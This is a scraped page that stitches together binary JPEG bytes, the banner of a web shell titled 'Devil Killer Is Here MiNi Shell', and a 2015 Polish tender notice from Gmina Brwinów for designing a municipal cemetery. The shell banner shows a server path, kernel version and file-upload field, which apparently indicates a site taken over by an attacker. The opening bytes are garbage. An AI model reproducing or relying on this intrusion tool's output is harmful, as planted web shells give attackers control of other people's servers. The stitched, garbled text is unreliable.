JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150615/87131-N-2015.html

<p class="kh_header"><b>Brwinów: Opracowanie koncepcji oraz dokumentacji projektowo - kosztorysowej budowy cmentarza komunalnego przy ul. Szkolnej w Żółwinie</b><br>
<b>Numer ogłoszenia: 87131 - 2015; data zamieszczenia: 15.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brwinów , ul. Grodziska 12, 05-840 Brwinów, woj. mazowieckie, tel. 7382567, faks 7295940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brwinow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie koncepcji oraz dokumentacji projektowo - kosztorysowej budowy cmentarza komunalnego przy ul. Szkolnej w Żółwinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: Opracowanie koncepcji oraz dokumentacji projektowo - kosztorysowej budowy cmentarza komunalnego przy ul. Szkolnej w Żółwinie.

2.	Szczegółowy zakres rzeczowy przedmiotu zamówienia.
1) Etap I. - opracowanie projektu koncepcyjnego.
Opracowanie winno być wykonane z uwzględnieniem poniższych wytycznych również w wersji elektronicznej umożliwiającej prezentację koncepcji.
2) Etap II. - wykonanie dokumentacji projektowo - kosztorysowej

3. Wykonanie dokumentacji projektowo-kosztorysowej obejmującej:
1) projekt budynku kostnicy/domu pogrzebowego wraz z zapleczem administracyjno - gospodarczym oraz chłodnią do przechowywania zwłok wraz z wyposażeniem,
2) projekt budynku ogólnodostępnego ustępów/ wolnostojących lub wbudowanych w bryłę w/w budynku z uwzględnieniem odrębnego wejścia z zewnątrz,
3) projekt garażu dla wózka akumulatorowego służącego do przewozu zwłok,
4) projekt miejsc przeznaczonych do gromadzenia odpadów umożliwiających ich selektywną zbiórkę w postaci zadaszonych i zamykanych osłon śmietnikowych,
5) projekt rozmieszczenia kwater wraz z układem ciągów komunikacyjnych,
6) projekt kolumbariów,
7) projekty instalacji wewnętrznych w budynku:
- gniazd wtykowych AC 230V,
- gniazda AC 400V wyprowadzone na zewnątrz budynku,
- oświetlenia ogólnego,
- oświetlenia awaryjnego/ewakuacyjnego,
- alarmowej i przeciwwłamaniowej,
- teletechnicznej/LAN,
- domofonowej,
- monitoringu wewnętrznego i zewnętrznego obiektów,
- wod - kan,
- C.O.
- wentylacji z rekuperacją, 
- piorunochronnej.
1)	Charakterystykę energetyczną budynku,
2)	Projekty instalacji zewnętrznych, przyłączy:
- projekt odcinka sieci wodociągowej ok. 450m,
- projekt przyłącza do sieci wodociągowej, 
- rozwiązanie wychwytywania nadmiaru wody,
- system przeciwpożarowego zaopatrzenia w wodę,
- projekt odprowadzania nieczystości płynnych wraz ze zbiornikiem szczelnym,
- projekt gospodarki wodami opadowymi,
- ujęcie wody do celów gospodarczych zaopatrujące punkty czerpania wody,
- projekt oświetlenia terenu o charakterze parkowym na terenie cmentarza oraz o charakterze oświetlenia ulicznego na terenie przeznaczonym pod parkingi,
- projekt WLZ,
- projekt przyłącza telekomunikacyjnego/lub inne alternatywa.
3)	Projekt drogowy obejmujący swoim zakresem:
- ciągi pieszo - jezdne,
- zjazd z drogi,
- odcinek drogi wykonany z kostki obejmujący swoim zakresem nieruchomości oznaczone w ewidencji gruntów jako dz. nr ew. 22/53, 22/54 tj. ok. 100m,
- projekt parkingów dla obsługi cmentarza oraz osób odwiedzających a także uwzględnienie miejsc dla handlu detalicznego sprzedaży zniczy i kwiatów z samochodów przez dniem zmarłych,
- miejsca wyznaczone dla detalicznej sprzedaży kwiatów, wiązanek i zniczy,
4)	Projekt ogrodzenia zewnętrznego wraz z bramą wjazdową i furtką,
5)	Projekt wiaty rowerowej lub wydzielonego miejsca przeznaczonego do usytuowania  stojaków na rowery,
6)	Projekt rozmieszczenia ławek i koszy na śmieci w głównych alejkach cmentarza,
7)	Mapa z naniesioną lokalizacją studni indywidualnych oraz ujęć wody służących do zbiorowego zaopatrzenia w wodę;
8)	Kompleksowy projekt zieleni obejmujący swoim zakresem:
- inwentaryzację szaty roślinnej w formie tabelarycznej oraz część graficzna w postaci planszy inwentaryzacyjnej zieleni z objaśnieniami,
- projekt szaty roślinnej wysokiej i niskiej,
- projekt utwardzonych ścieżek,
- określenie warunków i wymagań w zakresie utrzymania zieleni,
- projekt nawodnienia zieleni.
9)	Informację BIOZ dla zamierzeń, które są objęte obowiązkiem jej sporządzenia,
1.	Dokumentacja projektowo - wykonawcza winna się składać z następujących opracowań:
- projektów konstrukcyjnych,
- projektów architektoniczno - budowlanych,
- projektu zagospodarowania terenu ( część graficzna wykonana na kopii aktualnej mapy zasadniczej lub mapy jednostkowej, przyjętej do państwowego zasobu geodezyjnego i kartograficznego służącej do celów projektowych, zakupionej przez oferenta,
- projektów wykonawczych,
- planów, rysunków lub innych dokumentów umożliwiających jednoznaczne określenie rodzaju i zakresu robót budowlanych podstawowych oraz uwarunkowań i dokładnej lokalizacji ich wykonania - zalecana forma zbliżona do projektu budowlanego dotyczy robót objętych zgłoszeniem,
- specyfikacji technicznej wykonania i odbioru robót,
- kosztorysów inwestorskich oraz zbiorczego zestawienia kosztów,
- wersji elektronicznej w/w opracowań wraz z uzyskanymi pozwoleniami, uzgodnieniami i opiniami a także innymi opracowaniami w wersji elektronicznej (na nośniku CD lub DVD). Wszelkie opracowania należy przekazać zarówno w PDF jak i w wersjach edytowalnych.
Dokumentację stanowiącą podstawę do ubiegania się o pozwolenie na budowę należy wykonać w 5 egz., natomiast pozostałe opracowania w 4 egz. 
2.	Dane wyjściowe do projektowania:
Teren projektowanego cmentarza (działka nr ew. 22/51 obr 19) zajmuje łączna powierzchnię ok. 15ha z czego na obszarze 3,5 ha wyodrębniona została powierzchnia grzebalna, pozostałą część nieruchomości stanowi teren przeznaczony pod zagospodarowanie zielenią izolacyjną w postaci założenia parkowego oraz obszar parkingowo komunikacyjny z zielenią towarzyszącą. Powyższe podziały nieruchomości przeznaczonej pod budowę cmentarza zostały uregulowane ustaleniami miejscowego planu zagospodarowania przestrzennego a ich lokalizację określa załącznik graficzny do planu.
Na terenie cmentarza przewiduje się miejsca przeznaczone na składanie zwłok w postaci grobów ziemnych i murowanych a także kolumbariów.
 Dojazd do cmentarza odbywać się będzie za pośrednictwem nieruchomości stanowiących własność Gminy Brwinów (dz. 22/53, 22/54, 22/55, 22/56 obr 19) przeznaczonych zgodnie z planem miejscowym pod budowę dróg..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.02.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność stanowiąca przedmiot zamówienia nie wymaga posiadania szczególnych uprawnień wynikających z przepisów prawa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie 3 lat przed terminem składania ofert, a jeśli okres prowadzenia działalności jest krótszy to w tym okresie, wykonali minimum 1 zamówienie polegające na wykonaniu dokumentacji projektowej budowy lub rozbudowy cmentarza, z załączeniem dowodów, że zostały wykonane należycie;

1. Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o złożone dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.

2. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy, łączne doświadczenie i wiedza oraz ich łączna sytuacja ekonomiczna i finansowa.

3. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;
2) załącznik nr 3 - wykaz wykonanych lub wykonywanych, głównych usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie; Za główne usługi uznaje się usługi niezbędne do wykazania spełniania warunku określonego w pkt 1. ppkt 2.
a)	Dowodami są: 
- poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
- oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia. 
b)	Jeżeli Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie - załączniku nr 3, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
c)	W razie konieczności, szczególnie gdy wykaz usług lub dowody, o których mowa powyżej, budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje lub będzie dysponował w realizacji zamówienia osobami w specjalnościach: 
-	co najmniej 1 osobą z uprawnieniami budowlanymi do projektowania w specjalności architektonicznej, 
-	co najmniej 1 osobą z uprawnieniami budowlanymi do projektowania w specjalności konstrukcyjno - budowlanej,
-	co najmniej 1 osobą z uprawnieniami budowlanymi do projektowania w specjalności drogowej,
-	co najmniej 1 osobą z uprawnieniami budowlanymi do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych, 
-	co najmniej 1 osobą z uprawnieniami budowlanymi do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych
-	co najmniej 1 osobą z uprawnieniami budowlanymi do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
-	co najmniej 1 osobą wykształceniem właściwym do wykonywania projektów z zakresu architektury krajobrazu.

1. Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o złożone dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.

2. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy, łączne doświadczenie i wiedza oraz ich łączna sytuacja ekonomiczna i finansowa.

3. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;
2) załącznik nr 4 - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
UWAGA! Treść zobowiązania podmiotu trzeciego  powinna określać : 
a) kto jest podmiotem udostępniającym i przyjmującym zasoby, 
b) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia;
c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.
Wzór zobowiązania podmiotu trzeciego do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia stanowi załącznik nr 8 do SIWZ.

2)  Jeżeli Wykonawca, wykazując spełnianie warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać:
- dokumentów dotyczących w szczególności:
a)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia

3) Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art.26 ust. 2b ustawy Prawo zamówień publicznych, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Termin wykonania - 4</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia istotnej zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach:
1)	zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych, 
2)	zmiany podmiotu trzeciego (podwykonawcy), na którego zasobach Wykonawca potwierdził spełnianie warunków udziału w postępowaniu o udzielenie niniejszego zamówienia publicznego, a nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca, 
3)	w przypadku konieczności zmiany projektanta przedstawionego w ofercie - Wykonawca może dokonać zmiany tej osoby jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nową osobę na następujących warunkach:
a)	Wykonawca proponuje zmianę ww. osoby w szczególności w razie: śmierci, choroby lub zdarzeń losowych, niewywiązania się z obowiązków wynikających z umowy, rezygnacji tej osoby lub utraty przez nią wymaganych uprawnień,
b)	Zamawiający może żądać od Wykonawcy zmiany ww. osoby, jeżeli uzna, że nie wykonuje ona swoich obowiązków wynikających z umowy. Wykonawca obowiązany będzie do zmiany ww. osoby zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego,
c)	w przypadku zmiany ww. osoby, nowa osoba powołana do pełnienia ww. obowiązków musi spełniać wymagania określone w Specyfikacji Istotnych Warunków Zamówienia stanowiącej załącznik nr 3 do umowy,
d)	Wykonawca zobowiązany jest zmienić osobę wykonująca zamówienie zgodnie 
z wnioskiem Zamawiającego w terminie wskazanym w jego wniosku, pod rygorem uznania umowy za nienależycie wykonaną.
4)	jeżeli konieczność zmiany terminu oddania dokumentacji projektowej wynikła z okoliczności niezawinionych przez Wykonawcę, w szczególności została wymuszona oczekiwaniem na:
a)	wyniki konsultacji społecznych przeprowadzonych przez Zamawiającego, i konieczności ich uwzględnienia w dokumentacji projektowo-kosztorysowej, o czym mowa w § 2 ust. 4 umowy,
b)	uzgodnienia lub wydanie decyzji przez jakikolwiek właściwy organ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.brwinow.pl<br>
